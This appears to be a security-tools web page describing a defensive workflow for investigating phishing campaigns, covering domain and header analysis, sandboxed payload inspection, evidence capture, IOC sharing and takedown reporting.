Phishing Campaign Analysis
Investigating and analyzing phishing attacks to understand the campaign infrastructure, identify victims, and extract indicators of compromise. Covers email header analysis, domain investigation, payload examination, and evidence collection for takedown requests or law enforcement.
Phishing Domain Analysis
Investigate the domains used in the phishing campaign. Check WHOIS registration data, DNS records, registration dates, and hosting infrastructure. Look for typosquatting patterns, recently registered domains, and domains using free hosting or CDN services to hide their origin. Map the domain infrastructure to identify related campaigns by the same actor.
dnstwist
web-checkTip: dnstwist generates and checks thousands of domain permutations (typosquats, homoglyphs, bit-flips) to find related phishing domains. web-check provides comprehensive domain intelligence in one scan including DNS, WHOIS, SSL certificates, and technology stack. Check certificate transparency logs for other domains on the same certificate.
Email Header Analysis
Examine the raw email headers to trace the message path and identify the true sending infrastructure. Check SPF, DKIM, and DMARC results to understand whether the email was spoofed or sent from a legitimate-looking infrastructure. Extract the originating IP, mail server hostnames, and any relay information. Headers reveal whether the attacker used a compromised mail server, a bulk mailing service, or their own infrastructure.
Tools for this step
ExifToolTip: Read headers from bottom to top to trace the message path chronologically. exiftool extracts metadata from attached files which may reveal the author's identity or tools. Check the Return-Path and Received headers for the actual sending server. Look for mismatches between the display name and the actual email address.
URL and Payload Inspection
Analyze the URLs and any file attachments in the phishing email without clicking or opening them on a production system. Expand shortened URLs, check redirect chains, and identify the final landing page. For attachments, analyze them in a sandbox to understand what they do. Many phishing campaigns use multi-stage redirects through legitimate services to evade email filters.
Tools for this step
CyberChefTip: urlscan.io safely renders web pages and shows the full redirect chain, DOM content, and network requests. CyberChef decodes Base64, URL encoding, and other obfuscation used in phishing payloads. Never open attachments or click links on your actual machine - use a dedicated analysis VM or online sandbox.
Typosquat and Lookalike Detection
Proactively search for additional domains that could be used in the same campaign or future attacks. Generate permutations of the legitimate domain being impersonated and check which ones are registered. This helps identify infrastructure the attacker has staged but hasn't used yet, enabling preemptive blocking and takedown requests.
Tools for this step
Tip: dnstwist checks for multiple types of domain permutations including character omission, adjacent character swap, homoglyph substitution, and TLD changes. Many attackers register multiple lookalike domains at once. Feed the results into your DNS firewall or email gateway block list to prevent future campaigns from the same actor.
Screenshot Evidence and Page Archival
Capture visual evidence of the phishing pages before they're taken down. Screenshot the landing pages, credential harvesting forms, and any error or success pages. Archive the full page source code including JavaScript. Phishing pages are typically short-lived, so evidence collection must happen quickly before the attacker rotates infrastructure.
Tools for this step
EyeWitnessTip: EyeWitness captures screenshots and response headers for lists of URLs, generating a browsable HTML report. Archive pages through the Wayback Machine as well for an independent timestamp. Save the complete page source including external resources - the JavaScript often contains the credential exfiltration endpoint.
IOC Compilation and Sharing
Compile all indicators of compromise from the investigation: sending IPs, domains, URLs, file hashes, email addresses, and any unique strings from the phishing kit. Package these IOCs for sharing with your security operations team, threat intelligence platform, and relevant ISACs. Submit the phishing URLs to Google Safe Browsing and Microsoft SmartScreen for blocking.
GoPhishTip: GoPhish can be used to understand phishing campaign mechanics and test your own organization's resilience. CyberChef helps normalize and format IOCs for different sharing platforms. Report phishing domains to their registrar for takedown and the hosting provider for abuse action. Include a timeline of the campaign in your report.
Report and Defensive Recommendations
Write a complete analysis report covering the campaign's targeting, infrastructure, techniques, and indicators. Include recommendations for preventing similar attacks: email authentication (SPF/DKIM/DMARC), user awareness training topics highlighted by this campaign, email gateway rule updates, and DNS-level blocking of identified infrastructure.
Tip: Focus recommendations on what specifically got past existing defenses. If the phishing bypassed email filters, explain how and what rule would catch it. If users clicked, recommend targeted training on the specific lure technique used. Include the full IOC list in both human-readable and machine-ingestible formats.
Other Workflows
OSINT Investigation Workflow
A structured approach to open-source intelligence gathering, from target identification through to reporting. Covers passive reconnaissance, social media analysis, email and phone lookups, and data correlation.
Web Application Penetration Test
A systematic approach to testing web applications for security vulnerabilities. Covers reconnaissance, mapping, vulnerability discovery, exploitation, and reporting.
Active Directory Attack Path
From initial foothold to domain admin. A step-by-step approach to enumerating and attacking Active Directory environments during authorized penetration tests.